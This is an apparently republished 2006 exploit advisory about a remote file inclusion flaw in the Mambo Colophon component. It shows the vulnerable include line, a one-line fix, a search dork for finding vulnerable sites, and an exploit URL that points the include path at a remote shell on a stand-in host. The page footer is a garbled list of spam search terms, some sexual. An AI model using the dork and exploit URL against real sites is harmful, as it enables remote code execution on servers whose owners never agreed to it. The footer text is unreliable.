about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mambo Colophon Component <= 1.2 Remote Inclusion Vulnerability




2006-07-29 Mambo Colophon Component <= 1.2 Remote Inclusion Vulnerability 
Rated as : High Risk

###########  Command Mambo Colophon =<1.2 ##by #Drago84#########

      Found By Drago84
Exclusive Security Italian Security

  This bug allows a remote atacker to execute commands via rfi

page:
  admin.colophon.php

bug:

require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");

path:
add in admin.colophon.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_colophon

expl:
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
securitydot.net - 2006-07-29

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 00:06:30 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Video of m +girls+kis www.hpv39. news for c sexy pictu Xxl .sex global ann 5.2 jogos para www.bohail joomla Sun cart%20asp WWW.Sexfot ...y),655 star kissing ve Www+sexxy+ wordpress KOKO k...Fkmita OpenSSH 3. www.ragga. WWW 98SEX Powered b Sax vedeo linux 2.6. www.yexing WIndows CuteNews avizon.ir tamilactro k 1 Www.sex300 CommuniGat Www.Sexy.G 2.4.24 jshop m...ption= nudewomenp www.bead-d sexwomn videov news for c 200 /compo SEXY+LADIE Wap sex.co www.free6. Gambar Dew www.tb6.co www.yiwang